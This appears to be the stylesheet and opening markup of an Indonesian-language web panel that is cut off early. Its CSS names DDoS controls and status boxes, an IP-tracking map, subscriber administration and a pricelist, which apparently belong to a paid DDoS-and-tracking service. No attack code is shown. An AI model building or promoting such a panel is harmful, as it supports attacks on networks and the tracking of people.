<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<title>𝑺𝒉𝒂𝒅𝒐𝒘𝒐𝒇𝒏𝒊𝒈𝒉𝒕𝑭𝒐𝒓𝒔𝒉𝒊𝒔 ⃝✯</title>
<link rel="stylesheet" href="https://unpkg.com/leaflet@1.9.4/dist/leaflet.css" />
<script src="https://unpkg.com/leaflet@1.9.4/dist/leaflet.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" />
<style>
:root {
  --bg1: #0a0a0f;
  --bg2: #0f0f1a;
  --primary: #00f5ff;
  --primary-dark: #00c4cc;
  --primary-light: #5effff;
  --secondary: #ff2a6d;
  --accent: #05d9e8;
  --text: #d1f7ff;
  --text-muted: #8ba1b5;
  --panel: rgba(16, 22, 58, 0.85);
  --panel-border: rgba(0, 245, 255, 0.3);
  --success: #00ff9d;
  --warning: #ffcc00;
  --error: #ff2a6d;
  --card-shadow: 0 10px 30px rgba(0, 0, 0, 0.5);
  --glass: rgba(16, 22, 58, 0.6);
  --glass-border: rgba(0, 245, 255, 0.2);
  --gradient-1: linear-gradient(135deg, #00f5ff 0%, #0055ff 100%);
  --gradient-2: linear-gradient(135deg, #ff2a6d 0%, #ff0055 100%);
  --gradient-3: linear-gradient(135deg, #05d9e8 0%, #0077ff 100%);
  --gradient-4: linear-gradient(135deg, #00ff9d 0%, #00a2ff 100%);
}

* {
  box-sizing: border-box;
  margin: 0;
  padding: 0;
}

body {
  margin: 0; 
  font-family: 'Rajdhani', 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; 
  color: var(--text);
  background: linear-gradient(135deg, var(--bg1), var(--bg2));
  min-height: 100vh;
  overflow-x: hidden;
  position: relative;
}

.video-background {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  object-fit: cover;
  opacity: 0.05;
  z-index: -1;
  filter: blur(8px) brightness(0.4);
}

.overlay {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: radial-gradient(circle at 20% 80%, rgba(0, 245, 255, 0.1) 0%, transparent 50%),
              radial-gradient(circle at 80% 20%, rgba(255, 42, 109, 0.05) 0%, transparent 50%);
  z-index: -1;
}

.container {
  width: 100%;
  min-height: 100vh;
  display: flex;
  flex-direction: column;
  position: relative;
  padding-bottom: 90px;
}

.page { 
  width: 100%;
  flex: 1;
  display: none;
  flex-direction: column;
  align-items: center;
  justify-content: flex-start;
  padding: 20px;
  opacity: 0;
  transform: translateY(30px);
  transition: opacity 0.8s cubic-bezier(0.25, 0.46, 0.45, 0.94), transform 0.8s cubic-bezier(0.25, 0.46, 0.45, 0.94);
}

.page.active { 
  display: flex;
  opacity: 1;
  transform: translateY(0);
}

.content-area {
  width: 100%;
  max-width: 600px;
  padding: 50px 40px;
  text-align: center;
  position: relative;
  margin-top: 20px;
  animation: fadeInUp 1s cubic-bezier(0.25, 0.46, 0.45, 0.94) 0.2s both;
}

@keyframes fadeInUp {
  from {
    opacity: 0;
    transform: translateY(50px);
  }
  to {
    opacity: 1;
    transform: translateY(0);
  }
}

.brand-header {
  text-align: center;
  margin-bottom: 50px;
  position: relative;
  animation: slideInDown 1s cubic-bezier(0.25, 0.46, 0.45, 0.94) both;
}

@keyframes slideInDown {
  from {
    opacity: 0;
    transform: translateY(-50px);
  }
  to {
    opacity: 1;
    transform: translateY(0);
  }
}

.brand-header::after {
  content: '';
  display: block;
  width: 80px;
  height: 2px;
  background: linear-gradient(90deg, transparent, var(--primary), transparent);
  margin: 30px auto 0;
  border-radius: 3px;
}

.video-brand { 
  width: 100%;
  max-width: 500px;
  border-radius: 15px; 
  border: 1px solid var(--panel-border); 
  box-shadow: 0 0 40px rgba(0, 245, 255, 0.4); 
  display: block; 
  margin: 0 auto 30px; 
  height: auto;
  aspect-ratio: 16/9;
  transition: all 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  animation: pulseGlow 4s ease-in-out infinite, float 6s ease-in-out infinite;
}

@keyframes pulseGlow {
  0%, 100% {
    box-shadow: 0 0 30px rgba(0, 245, 255, 0.4);
  }
  50% {
    box-shadow: 0 0 60px rgba(0, 245, 255, 0.7);
  }
}

@keyframes float {
  0%, 100% {
    transform: translateY(0);
  }
  50% {
    transform: translateY(-10px);
  }
}

.video-brand:hover {
  box-shadow: 0 0 80px rgba(0, 245, 255, 0.9);
  transform: translateY(-8px) scale(1.02);
}

.brand-title {
  font-size: 3.5rem;
  font-weight: 800;
  background: linear-gradient(135deg, var(--primary), var(--primary-light));
  -webkit-background-clip: text;
  -webkit-text-fill-color: transparent;
  background-clip: text;
  text-shadow: 0 5px 30px rgba(0, 245, 255, 0.4);
  letter-spacing: 2px;
  margin: 20px 0;
  position: relative;
  display: inline-block;
  animation: textShine 3s ease-in-out infinite;
}

@keyframes textShine {
  0%, 100% {
    text-shadow: 0 5px 30px rgba(0, 245, 255, 0.4);
  }
  50% {
    text-shadow: 0 5px 50px rgba(0, 245, 255, 0.8);
  }
}

.brand-title::after {
  content: '';
  position: absolute;
  bottom: -12px;
  left: 50%;
  transform: translateX(-50%);
  width: 100px;
  height: 3px;
  background: linear-gradient(90deg, transparent, var(--primary), transparent);
  border-radius: 4px;
}

.subtitle { 
  font-weight: 600; 
  color: var(--text-muted); 
  margin: 15px 0 30px; 
  font-size: 1.2rem;
  letter-spacing: 1px;
  animation: fadeIn 1.2s ease-out 0.4s both;
}

@keyframes fadeIn {
  from { opacity: 0; }
  to { opacity: 1; }
}

h2 { 
  margin: 25px 0 30px; 
  color: var(--primary);
  font-weight: 700;
  text-align: center;
  font-size: 2.2rem;
  animation: fadeIn 1s ease-out 0.3s both;
}

.input-group {
  margin-bottom: 30px;
  text-align: left;
  animation: fadeInUp 1s ease-out 0.5s both;
}

.input-group label {
  display: block;
  margin-bottom: 12px;
  font-size: 1.1rem;
  color: var(--text-muted);
  font-weight: 600;
  letter-spacing: 0.5px;
}

input, select, button, textarea { 
  width: 100%; 
  padding: 16px 20px; 
  border: none; 
  border-radius: 10px; 
  font-size: 16px; 
  transition: all 0.4s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  font-family: inherit;
}

input, select, textarea { 
  background: var(--glass); 
  color: var(--text); 
  outline: none; 
  border: 1px solid var(--glass-border);
  box-shadow: inset 0 0 15px rgba(0, 0, 0, 0.2); 
  backdrop-filter: blur(15px);
}

input:focus, select:focus, textarea:focus {
  border-color: var(--primary);
  box-shadow: inset 0 0 20px rgba(0, 245, 255, 0.1), 0 0 20px rgba(0, 245, 255, 0.15);
  transform: translateY(-3px);
}

.select-wrapper {
  position: relative;
  margin-bottom: 30px;
  animation: fadeInUp 1s ease-out 0.6s both;
}

.select-wrapper::after {
  content: "▼";
  font-size: 14px;
  color: var(--text-muted);
  position: absolute;
  right: 25px;
  top: 50%;
  transform: translateY(-50%);
  pointer-events: none;
  transition: all 0.4s ease;
}

select {
  appearance: none;
  -webkit-appearance: none;
  -moz-appearance: none;
  background-image: none;
  cursor: pointer;
  padding-right: 60px;
  background: linear-gradient(135deg, var(--glass), rgba(0, 245, 255, 0.05));
  border: 1px solid var(--glass-border);
  color: var(--text);
  font-weight: 500;
}

select:hover {
  border-color: var(--primary-light);
  background: linear-gradient(135deg, var(--glass), rgba(0, 245, 255, 0.08));
}

.select-wrapper:focus-within::after {
  color: var(--primary);
  transform: translateY(-50%) rotate(180deg);
}

select option {
  background: var(--panel);
  color: var(--text);
  padding: 15px;
}

select:focus {
  background: linear-gradient(135deg, var(--glass), rgba(0, 245, 255, 0.1));
}

button { 
  background: linear-gradient(135deg, var(--primary), var(--primary-dark)); 
  color: #0a0a0f; 
  font-weight: 700; 
  cursor: pointer; 
  box-shadow: 0 8px 25px rgba(0, 245, 255, 0.4); 
  transition: all 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  position: relative;
  overflow: hidden;
  letter-spacing: 1.5px;
  border: none;
  margin-top: 20px;
  backdrop-filter: blur(15px);
  animation: fadeInUp 1s ease-out 0.7s both;
  padding: 16px 20px;
  font-size: 16px;
}

button:hover { 
  transform: translateY(-6px);
  box-shadow: 0 12px 35px rgba(0, 245, 255, 0.6);
  letter-spacing: 2px;
}

button:active {
  transform: translateY(0);
  box-shadow: 0 5px 20px rgba(0, 245, 255, 0.3);
}

button::after {
  content: '';
  position: absolute;
  top: 0;
  left: -100%;
  width: 100%;
  height: 100%;
  background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.4), transparent);
  transition: 0.8s;
}

button:hover::after {
  left: 100%;
}

.note { 
  font-size: 15px; 
  opacity: .9;
  margin-top: 25px;
  color: var(--text-muted);
  text-align: center;
  line-height: 1.7;
  animation: fadeIn 1.2s ease-out 0.8s both;
}

.note a { 
  color: var(--primary); 
  text-decoration: none;
  transition: all 0.4s ease;
  font-weight: 700;
  position: relative;
}

.note a:hover { 
  color: var(--primary-light);
  text-shadow: 0 0 10px rgba(0, 245, 255, 0.5);
}

.note a::after {
  content: '';
  position: absolute;
  bottom: -2px;
  left: 0;
  width: 0;
  height: 2px;
  background: var(--primary);
  transition: width 0.4s ease;
}

.note a:hover::after {
  width: 100%;
}

.brand-header-small .video-brand {
  width: 350px;
  margin-bottom: 25px;
}

.bottom-nav {
  position: fixed;
  bottom: 0;
  left: 0;
  right: 0;
  background: rgba(16, 22, 58, 0.95);
  border-top: 1px solid var(--glass-border);
  backdrop-filter: blur(25px);
  z-index: 100;
  padding: 18px 0;
  box-shadow: 0 -10px 40px rgba(0, 0, 0, 0.7);
  display: none;
  animation: slideUp 0.6s cubic-bezier(0.25, 0.46, 0.45, 0.94);
}

@keyframes slideUp {
  from {
    transform: translateY(100%);
    opacity: 0;
  }
  to {
    transform: translateY(0);
    opacity: 1;
  }
}

.nav-tabs {
  display: flex;
  justify-content: space-around;
  max-width: 800px;
  margin: 0 auto;
  padding: 0 25px;
}

.nav-tab {
  display: flex;
  flex-direction: column;
  align-items: center;
  padding: 12px 15px;
  border-radius: 15px;
  cursor: pointer;
  transition: all 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  opacity: 0.7;
  color: var(--text-muted);
  text-decoration: none;
  min-width: 70px;
  position: relative;
  overflow: hidden;
}

.nav-tab.active {
  opacity: 1;
  color: var(--primary);
  background: rgba(0, 245, 255, 0.2);
  transform: translateY(-8px);
  box-shadow: 0 10px 25px rgba(0, 245, 255, 0.3);
}

.nav-tab i {
  font-size: 22px;
  margin-bottom: 6px;
  transition: all 0.5s ease;
}

.nav-tab.active i {
  color: var(--primary);
  transform: scale(1.3);
}

.nav-tab span {
  font-size: 12px;
  font-weight: 700;
  transition: all 0.5s ease;
  letter-spacing: 0.5px;
}

.nav-tab.active span {
  color: var(--primary);
  font-weight: 800;
}

.nav-tab:hover:not(.active) {
  opacity: 0.9;
  background: rgba(0, 245, 255, 0.1);
  transform: translateY(-4px);
}

.nav-tab::before {
  content: '';
  position: absolute;
  top: 0;
  left: -100%;
  width: 100%;
  height: 100%;
  background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);
  transition: 0.8s;
}

.nav-tab:hover::before {
  left: 100%;
}

.action-selector {
  display: flex;
  gap: 20px;
  margin-top: 40px;
  align-items: stretch;
  background: var(--glass);
  border-radius: 15px;
  padding: 20px;
  border: 1px solid var(--glass-border);
  box-shadow: 0 10px 35px rgba(0, 0, 0, 0.4);
  backdrop-filter: blur(15px);
  animation: fadeInUp 1s ease-out 0.6s both;
}

.action-selector select {
  flex: 2;
  border-radius: 10px;
  background: linear-gradient(135deg, var(--glass), rgba(0, 245, 255, 0.05));
  border: 1px solid var(--primary-light);
  color: var(--text);
  font-weight: 600;
  box-shadow: inset 0 4px 15px rgba(0, 0, 0, 0.2);
}

.action-selector button {
  flex: 1;
  border-radius: 10px;
  background: var(--gradient-2);
  box-shadow: 0 10px 25px rgba(255, 42, 109, 0.5);
  font-weight: 700;
  letter-spacing: 1.5px;
  transition: all 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  margin-top: 0;
}

.action-selector button:hover {
  transform: translateY(-6px);
  box-shadow: 0 15px 35px rgba(255, 42, 109, 0.7);
}

.action-selector button:active {
  transform: translateY(0);
}

.action-btn {
  background: linear-gradient(135deg, var(--primary), var(--primary-dark));
  border: none;
  border-radius: 15px;
  padding: 20px;
  color: #0a0a0f;
  font-weight: 700;
  cursor: pointer;
  transition: all 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  box-shadow: 0 10px 30px rgba(0, 245, 255, 0.4);
  position: relative;
  overflow: hidden;
  animation: fadeInUp 1s ease-out 0.7s both;
  letter-spacing: 1.5px;
}

.action-btn:hover {
  transform: translateY(-6px);
  box-shadow: 0 15px 40px rgba(0, 245, 255, 0.6);
  letter-spacing: 2px;
}

.action-btn:active {
  transform: translateY(0);
}

.action-btn::before {
  content: '';
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: linear-gradient(rgba(255, 255, 255, 0.2), transparent);
}

.result-area {
  text-align: center;
  max-height: 80vh;
  overflow: hidden;
  display: flex;
  flex-direction: column;
}

pre {
  background: var(--glass);
  padding: 25px;
  border-radius: 15px;
  overflow: auto;
  text-align: left;
  font-family: 'Courier New', monospace;
  font-size: 15px;
  border: 1px solid var(--glass-border);
  max-height: 350px;
  white-space: pre-wrap;
  word-break: break-all;
  scrollbar-width: thin;
  scrollbar-color: var(--primary) rgba(0, 0, 0, 0.4);
  backdrop-filter: blur(15px);
  animation: fadeInUp 1s ease-out 0.5s both;
  line-height: 1.6;
}

pre::-webkit-scrollbar {
  width: 10px;
}

pre::-webkit-scrollbar-track {
  background: rgba(0, 0, 0, 0.4);
  border-radius: 5px;
}

pre::-webkit-scrollbar-thumb {
  background: var(--primary);
  border-radius: 5px;
}

pre::-webkit-scrollbar-thumb:hover {
  background: var(--primary-dark);
}

.status-indicator {
  display: inline-block;
  width: 14px;
  height: 14px;
  border-radius: 50%;
  margin-right: 12px;
  animation: pulse 2s infinite;
}

@keyframes pulse {
  0% { transform: scale(0.9); opacity: 1; }
  50% { transform: scale(1.2); opacity: 0.7; }
  100% { transform: scale(0.9); opacity: 1; }
}

.status-success {
  background: var(--success);
  box-shadow: 0 0 15px var(--success);
}

.status-error {
  background: var(--error);
  box-shadow: 0 0 15px var(--error);
}

.status-processing {
  background: var(--warning);
  box-shadow: 0 0 15px var(--warning);
}

.ip-tracking-result {
  background: var(--glass);
  padding: 25px;
  border-radius: 15px;
  margin-top: 30px;
  border: 1px solid var(--glass-border);
  text-align: left;
  font-size: 15px;
  line-height: 1.7;
  max-height: 350px;
  overflow-y: auto;
  scrollbar-width: thin;
  scrollbar-color: var(--primary) rgba(0, 0, 0, 0.4);
  backdrop-filter: blur(15px);
  animation: fadeInUp 1s ease-out 0.6s both;
}

.ip-tracking-result div {
  margin-bottom: 15px;
  display: flex;
  align-items: center;
  padding: 8px 0;
  border-bottom: 1px solid rgba(255, 255, 255, 0.05);
}

.ip-tracking-result i {
  width: 25px;
  margin-right: 18px;
  color: var(--primary);
  font-size: 18px;
}

#map {
  height: 350px;
  width: 100%;
  border-radius: 15px;
  margin-top: 30px;
  border: 1px solid var(--glass-border);
  animation: fadeInUp 1s ease-out 0.7s both;
}

.popup {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.9);
  display: flex;
  align-items: center;
  justify-content: center;
  z-index: 1000;
  opacity: 0;
  pointer-events: none;
  transition: opacity 0.5s ease;
  backdrop-filter: blur(10px);
}

.popup.active {
  opacity: 1;
  pointer-events: auto;
}

.popup-content {
  background: var(--panel);
  border-radius: 20px;
  padding: 35px;
  width: min(90vw, 450px);
  box-shadow: var(--card-shadow);
  text-align: center;
  position: relative;
  transform: scale(0.8) translateY(30px);
  transition: transform 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  backdrop-filter: blur(25px);
  border: 1px solid var(--glass-border);
  animation: popIn 0.6s cubic-bezier(0.25, 0.46, 0.45, 0.94);
}

@keyframes popIn {
  0% {
    transform: scale(0.7) translateY(40px);
    opacity: 0;
  }
  100% {
    transform: scale(1) translateY(0);
    opacity: 1;
  }
}

.popup.active .popup-content {
  transform: scale(1) translateY(0);
}

.popup-close {
  position: absolute;
  top: 20px;
  right: 20px;
  background: none;
  border: none;
  color: var(--text-muted);
  font-size: 24px;
  cursor: pointer;
  width: auto;
  padding: 0;
  transition: all 0.4s ease;
}

.popup-close:hover {
  color: var(--text);
  transform: rotate(90deg);
}

.home-area {
  text-align: center;
}

.user-info {
  background: var(--gradient-1);
  border-radius: 20px;
  padding: 35px;
  margin: 35px 0;
  box-shadow: 0 15px 40px rgba(0, 197, 204, 0.5);
  animation: fadeInUp 1s ease-out 0.5s both;
  position: relative;
  overflow: hidden;
}

.user-info::before {
  content: '';
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: linear-gradient(45deg, transparent, rgba(255, 255, 255, 0.15), transparent);
  transform: translateX(-100%);
  transition: transform 0.8s;
}

.user-info:hover::before {
  transform: translateX(100%);
}

.user-info h3 {
  color: #0a0a0f;
  margin-bottom: 30px;
  font-size: 1.6rem;
  font-weight: 700;
}

.user-details {
  display: grid;
  grid-template-columns: 1fr 1fr;
  gap: 20px;
  text-align: left;
  color: #0a0a0f;
}

.user-details div {
  padding: 15px;
  background: rgba(255, 255, 255, 0.2);
  border-radius: 10px;
  backdrop-filter: blur(15px);
  transition: all 0.4s ease;
  border: 1px solid rgba(255, 255, 255, 0.1);
}

.user-details div:hover {
  transform: translateY(-5px);
  background: rgba(255, 255, 255, 0.25);
}

.developer-links {
  display: grid;
  grid-template-columns: 1fr 1fr;
  gap: 25px;
  margin-top: 35px;
  animation: fadeInUp 1s ease-out 0.7s both;
}

.dev-btn {
  display: flex;
  align-items: center;
  justify-content: center;
  gap: 15px;
  padding: 20px;
  border-radius: 15px;
  background: var(--gradient-4);
  color: #0a0a0f;
  text-decoration: none;
  font-weight: 700;
  transition: all 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  box-shadow: 0 10px 30px rgba(0, 255, 157, 0.5);
  position: relative;
  overflow: hidden;
  letter-spacing: 1px;
}

.dev-btn:hover {
  transform: translateY(-8px);
  box-shadow: 0 15px 40px rgba(0, 255, 157, 0.7);
  letter-spacing: 1.5px;
}

.dev-btn.telegram {
  background: var(--gradient-3);
  box-shadow: 0 10px 30px rgba(5, 217, 232, 0.5);
}

.dev-btn.telegram:hover {
  box-shadow: 0 15px 40px rgba(5, 217, 232, 0.7);
}

.dev-btn::before {
  content: '';
  position: absolute;
  top: 0;
  left: -100%;
  width: 100%;
  height: 100%;
  background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.3), transparent);
  transition: 0.8s;
}

.dev-btn:hover::before {
  left: 100%;
}

.feature-grid {
  display: grid;
  grid-template-columns: 1fr 1fr 1fr 1fr;
  gap: 20px;
  margin-top: 35px;
  animation: fadeInUp 1s ease-out 0.8s both;
}

.feature-item {
  background: var(--glass);
  border-radius: 15px;
  padding: 25px;
  text-align: center;
  border: 1px solid var(--glass-border);
  transition: all 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94);
  backdrop-filter: blur(15px);
  position: relative;
  overflow: hidden;
}

.feature-item:hover {
  transform: translateY(-8px);
  box-shadow: 0 15px 40px rgba(0, 245, 255, 0.3);
  border-color: var(--primary);
}

.feature-item i {
  font-size: 32px;
  color: var(--primary);
  margin-bottom: 15px;
  transition: all 0.5s ease;
}

.feature-item:hover i {
  transform: scale(1.3);
  color: var(--primary-light);
}

.feature-item h4 {
  color: var(--text);
  margin-bottom: 10px;
  font-size: 1.1rem;
  font-weight: 700;
}

.feature-item p {
  color: var(--text-muted);
  font-size: 0.9rem;
  line-height: 1.5;
}

.feature-item::before {
  content: '';
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 4px;
  background: linear-gradient(90deg, var(--primary), var(--primary-light));
  transform: scaleX(0);
  transition: transform 0.5s ease;
}

.feature-item:hover::before {
  transform: scaleX(1);
}

.music-player {
  background: var(--glass);
  border-radius: 15px;
  padding: 30px;
  margin-top: 30px;
  border: 1px solid var(--glass-border);
  backdrop-filter: blur(15px);
  animation: fadeInUp 1s ease-out 0.6s both;
}

.music-controls {
  display: flex;
  gap: 15px;
  margin-top: 20px;
}

.music-controls button {
  flex: 1;
  margin-top: 0;
}

.music-info {
  text-align: left;
  margin-bottom: 20px;
  padding: 15px;
  background: rgba(0, 245, 255, 0.1);
  border-radius: 10px;
  border: 1px solid var(--glass-border);
}

.music-info h4 {
  color: var(--primary);
  margin-bottom: 8px;
  font-size: 1.1rem;
}

.music-info p {
  color: var(--text-muted);
  font-size: 0.9rem;
  margin-bottom: 5px;
}

.audio-player {
  width: 100%;
  margin: 15px 0;
  border-radius: 10px;
}

.audio-player::-webkit-media-controls-panel {
  background: var(--glass);
}

.audio-player::-webkit-media-controls-play-button {
  background-color: var(--primary);
  border-radius: 50%;
}

.search-results {
  max-height: 300px;
  overflow-y: auto;
  margin-top: 20px;
  border-radius: 10px;
  background: var(--glass);
  border: 1px solid var(--glass-border);
}

.search-result-item {
  padding: 15px;
  border-bottom: 1px solid var(--glass-border);
  cursor: pointer;
  transition: all 0.3s ease;
  display: flex;
  align-items: center;
  gap: 15px;
}

.search-result-item:hover {
  background: rgba(0, 245, 255, 0.1);
  transform: translateX(5px);
}

.search-result-item:last-child {
  border-bottom: none;
}

.search-result-item img {
  width: 60px;
  height: 45px;
  border-radius: 8px;
  object-fit: cover;
}

.search-result-info {
  flex: 1;
  text-align: left;
}

.search-result-info h5 {
  color: var(--text);
  margin-bottom: 5px;
  font-size: 0.9rem;
}

.search-result-info p {
  color: var(--text-muted);
  font-size: 0.8rem;
  margin: 0;
}

.ddos-controls {
  display: grid;
  gap: 20px;
  margin-top: 30px;
}

.ddos-controls .input-group {
  margin-bottom: 0;
}

.ddos-controls .action-selector {
  margin-top: 0;
}

.ddos-status {
  margin-top: 25px;
  padding: 20px;
  background: var(--glass);
  border-radius: 10px;
  border: 1px solid var(--glass-border);
  text-align: left;
  font-size: 14px;
  line-height: 1.6;
  max-height: 200px;
  overflow-y: auto;
  scrollbar-width: thin;
  scrollbar-color: var(--primary) rgba(0, 0, 0, 0.3);
}

.ddos-status div {
  margin-bottom: 10px;
  display: flex;
  align-items: center;
}

.ddos-status i {
  width: 20px;
  margin-right: 12px;
  color: var(--primary);
}

.admin-panel {
  width: 100%;
  max-width: 1000px;
  margin: 0 auto;
}

.admin-content { 
  background: var(--glass); 
  border: 1px solid var(--glass-border);
  border-radius: 15px; 
  padding: 30px; 
  box-shadow: var(--card-shadow);
  margin-bottom: 20px;
  backdrop-filter: blur(15px);
  position: relative;
  overflow: hidden;
}

.admin-content::before {
  content: '';
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 4px;
  background: linear-gradient(90deg, var(--primary), var(--primary-light));
}

.admin-row { 
  display: grid; 
  gap: 16px; 
  grid-template-columns: 1fr 1fr 1fr 1fr auto; 
  align-items: center; 
  padding: 16px 0;
  border-bottom: 1px solid rgba(108, 117, 125, 0.15);
}

.admin-row:last-child {
  border-bottom: none;
}

.admin-list { 
  margin-top: 20px; 
  max-height: 400px;
  overflow-y: auto;
  overflow-x: hidden;
  border-radius: 10px;
  background: rgba(40, 40, 40, 0.5);
  padding: 15px;
  scrollbar-width: thin;
  scrollbar-color: var(--primary) rgba(0, 0, 0, 0.3);
}

.admin-list::-webkit-scrollbar {
  width: 8px;
}

.admin-list::-webkit-scrollbar-track {
  background: rgba(0, 0, 0, 0.3);
  border-radius: 4px;
}

.admin-list::-webkit-scrollbar-thumb {
  background: var(--primary);
  border-radius: 4px;
}

.admin-list::-webkit-scrollbar-thumb:hover {
  background: var(--primary-dark);
}

.badge { 
  padding: 6px 12px; 
  border-radius: 999px; 
  font-size: 12px; 
  background: #343a40; 
  display: inline-block;
  font-weight: 500;
  color: var(--text);
}

.badge.ok { 
  background: var(--success); 
  color: #0a0a0f;
}

.badge.exp { 
  background: var(--warning); 
  color: #0a0a0f;
}

.actions button { 
  padding: 8px 12px; 
  margin-left: 6px; 
  border-radius: 8px; 
  font-size: 14px;
  width: auto;
}

.pricelist-container {
  background: var(--glass);
  border-radius: 15px;
  padding: 30px;
  margin-top: 30px;
  border: 1px solid var(--glass-border);
  backdrop-filter: blur(15px);
  animation: fadeInUp 1s ease-out 0.6s both;
}

.pricelist-grid {
  display: grid;
  grid-template-columns: repeat(auto-fill, minmax(250px, 1fr));
  gap: 20px;
  margin-top: 20px;
}

.pricelist-item {
  background: rgba(0, 245, 255, 0.1);
  border-radius: 10px;
  padding: 20px;
  text-align: center;
  border: 1px solid var(--glass-border);
  transition: all 0.4s ease;
}

.pricelist-item:hover {
  transform: translateY(-5px);
  box-shadow: 0 10px 25px rgba(0, 245, 255, 0.3);
}

.pricelist-item h4 {
  color: var(--primary);
  margin-bottom: 10px;
  font-size: 1.2rem;
}

.pricelist-item .price {
  font-size: 1.5rem;
  font-weight: 700;
  color: var(--text);
  margin: 10px 0;
}

.pricelist-item .duration {
  color: var(--text-muted);
  font-size: 0.9rem;
}

.pricelist-item .features {
  margin-top: 15px;
  text-align: left;
  font-size: 0.9rem;
}

.pricelist-item .features li {
  margin-bottom: 8px;
  display: flex;
  align-items: center;
}

.pricelist-item .features i {
  color: var(--primary);
  margin-right: 10px;
}

@media (max-width: 768px){
  .brand-title {
    font-size: 2.5rem;
  }
  .action-selector {
    flex-direction: column;
  }
  .action-selector select,
  .action-selector button {
    border-radius: 10px;
  }
  .ip-tracking-result div {
    flex-direction: column;
    align-items: flex-start;
  }
  .ip-tracking-result i {
    margin-bottom: 8px;
  }
  .nav-tab span {
    font-size: 11px;
  }
  .nav-tab {
    padding: 10px 12px;
    min-width: 65px;
  }
  .container {
    padding: 15px;
  }
  .video-brand {
    max-width: 350px;
  }
  .user-details {
    grid-template-columns: 1fr;
  }
  .developer-links {
    grid-template-columns: 1fr;
  }
  .feature-grid {
    grid-template-columns: 1fr 1fr;
  }
  .content-area {
    padding: 40px 25px;
  }
  h2 {
    font-size: 1.8rem;
  }
  .nav-tabs {
    max-width: 100%;
    padding: 0 15px;
  }
  .admin-row { 
    grid-template-columns: 1fr 1fr; 
    gap: 12px;
  }
  .admin-row .wide { 
    grid-column: 1 / -1; 
  }
  .pricelist-grid {
    grid-template-columns: 1fr;
  }
}

@media (max-width: 480px) {
  .content-area {
    padding: 35px 20px;
  }
  .brand-title {
    font-size: 2rem;
  }
  .nav-tab span {
    display: none;
  }
  .nav-tab i {
    font-size: 20px;
    margin-bottom: 0;
  }
  .nav-tab {
    min-width: 60px;
    padding: 12px;
  }
  .video-brand {
    max-width: 280px;
  }
  h2 {
    font-size: 1.6rem;
  }
  .feature-grid {
    grid-template-columns: 1fr;
  }
  .admin-row {
    grid-template-columns: 1fr;
    gap: 10px;
  }
}

.particle {
  position: absolute;
  width: 6px;
  height: 6px;
  background: var(--primary);
  border-radius: 50%;
  opacity: 0;
  animation: particleFloat 8s infinite linear;
  pointer-events: none;
}

@keyframes particleFloat {
  0% {
    transform: translateY(100vh) rotate(0deg);
    opacity: 0;
  }
  10% {
    opacity: 0.7;
  }
  90% {
    opacity: 0.7;
  }
  100% {
    transform: translateY(-100px) rotate(360deg);
    opacity: 0;
  }
}

.glow-effect {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: radial-gradient(circle at 20% 80%, rgba(0, 245, 255, 0.1) 0%, transparent 50%),
              radial-gradient(circle at 80% 20%, rgba(255, 42, 109, 0.05) 0%, transparent 50%);
  pointer-events: none;
  z-index: -1;
}

.user-management-tab {
  display: none;
}

.cyber-grid {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-image: 
    linear-gradient(rgba(0, 245, 255, 0.03) 1px, transparent 1px),
    linear-gradient(90deg, rgba(0, 245, 255, 0.03) 1px, transparent 1px);
  background-size: 50px 50px;
  z-index: -1;
  pointer-events: none;
}

.terminal-text {
  font-family: 'Courier New', monospace;
  color: var(--primary);
  text-shadow: 0 0 10px rgba(0, 245, 255, 0.7);
}

.cyber-button {
  position: relative;
  overflow: hidden;
  border: 1px solid var(--primary);
  background: transparent;
  color: var(--primary);
  transition: all 0.4s ease;
}

.cyber-button::before {
  content: '';
  position: absolute;
  top: 0;
  left: -100%;
  width: 100%;
  height: 100%;
  background: linear-gradient(90deg, transparent, rgba(0, 245, 255, 0.4), transparent);
  transition: 0.5s;
}

.cyber-button:hover::before {
  left: 100%;
}

.cyber-button:hover {
  background: rgba(0, 245, 255, 0.1);
  box-shadow: 0 0 20px rgba(0, 245, 255, 0.5);
}

.panel-glow {
  box-shadow: 0 0 30px rgba(0, 245, 255, 0.2);
  border: 1px solid rgba(0, 245, 255, 0.3);
}

.scan-line {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 2px;
  background: linear-gradient(90deg, transparent, var(--primary), transparent);
  animation: scan 3s linear infinite;
}

@keyframes scan {
  0% {
    top: 0;
  }
  100% {
    top: 100%;
  }
}
</style>
</head>
<body>
<div class="glow-effect"></div>
<div class="cyber-grid"></div>
<video autoplay muted loop class="video-background">
  <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
</video>
<div class="overlay"></div>

<div class="container">
  <section id="page-pricelist" class="page active">
    <div class="content-area">
      <div class="brand-header">
        <video autoplay muted loop class="video-brand">
          <source src="https://files.catbox.moe/933jyk.mp4" type="video/mp4">
        </video>
